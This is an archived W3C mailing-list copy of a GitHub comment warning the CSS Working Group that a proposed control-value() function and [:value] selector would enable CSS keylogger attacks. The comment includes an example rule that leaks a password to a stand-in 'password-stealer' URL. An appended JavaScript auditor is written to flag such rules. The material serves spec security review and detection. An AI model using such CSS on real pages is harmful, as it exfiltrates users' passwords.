- From: Bramus via GitHub <sysbot+gh@w3.org>
- Date: Fri, 04 Apr 2025 12:44:30 +0000
- To: public-css-archive@w3.org

The security aspects of this seem to be only _very lightly_ covered in the WG’s discussion.

There is a _huge_ difference between `attr()` and `control-value()`: the former works with the content attribute and the latter works with the IDL attribute. Content attributes typically don’t change _(there are some exceptions, like `<dialog>`’s `[open]`)_ but IDL attributes do.

So using `attr()` to read back the current value of an `<input type=password>` is not possible _(unless you do two way data-binding, like React typically does)_ but with `control-value()` that door is wide open, enabling a [CSS Keylogger Attack](https://www.bram.us/2018/02/21/css-keylogger-and-why-you-shouldnt-worry-about-it/).

Introducing something like `attr()`-tainting might solve this in order to prevent the values from being used in URLs. But if [the suggested `[:value]` selector](https://github.com/w3c/csswg-drafts/issues/354) comes into existence, `control-value()`-tainting won’t help at all:

```css
input[type="password"][:value="Password1!"] {
  background-image: url("https://example.org/password-stealer/Password1!");
}
```

--
GitHub Notification of comment by bramus
Please view or discuss this issue at https://github.com/w3c/csswg-drafts/issues/7869#issuecomment-2778635884 using your GitHub account

--
Sent via github-notify-ml as configured in https://github.com/w3c/github-notify-ml-config
Received on Friday, 4 April 2025 12:44:30 UTC
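
As an added example (not part of the original message, and not code from the CSSWG or the linked article), the JavaScript below audits stylesheet text for rules that combine a value selector with a resource fetch, the pattern in the rule quoted in the message. The function names, regexes and sample stylesheet are constructed for illustration.

```javascript
// Constructed sample stylesheet; the last rule is the one quoted in the message.
const SAMPLE_CSS = `
/* value selector, but nothing is fetched */
input[type="text"][value=""] { border-color: red; }
/* fetch, but no value selector */
.hero { background-image: url("/img/hero.png"); }
/* content-attribute value selector + fetch */
@media screen {
  input[type="password"][value="Password1!"] { background: url(https://example.org/a); }
}
/* proposed IDL-value selector + fetch */
input[type="password"][:value="Password1!"] {
  background-image: url("https://example.org/password-stealer/Password1!");
}
`;

// [value], [value="x"], [value^="x"] ... and the proposed [:value...] form.
const VALUE_SELECTOR = /\[\s*:?value\s*(?:[~|^$*]?=|\])/i;
// Declaration values that make the browser request a resource.
const FETCH_FUNCTION = /\b(?:url|image-set)\s*\(/i;

function stripComments(css) {
  return css.replace(/\/\*[\s\S]*?\*\//g, "");
}

// Collect innermost `selector { declarations }` blocks, so rules nested in
// @media are found too. Braces inside quoted strings are not handled.
function parseRules(css) {
  const rules = [];
  const re = /([^{}]+)\{([^{}]*)\}/g;
  for (const m of stripComments(css).matchAll(re)) {
    rules.push({ selector: m[1].trim(), body: m[2].trim() });
  }
  return rules;
}

// Rules that both match on a control's value and trigger a network request.
function findValueLeakRules(css) {
  return parseRules(css).filter(
    (r) => VALUE_SELECTOR.test(r.selector) && FETCH_FUNCTION.test(r.body)
  );
}

for (const r of findValueLeakRules(SAMPLE_CSS)) {
  console.log("flagged:", r.selector);
}
```

A check like this can run over first-party and third-party CSS in a build or review step; it inspects the selector, so it still flags the `[:value]` case where tainting of `control-value()` would not apply.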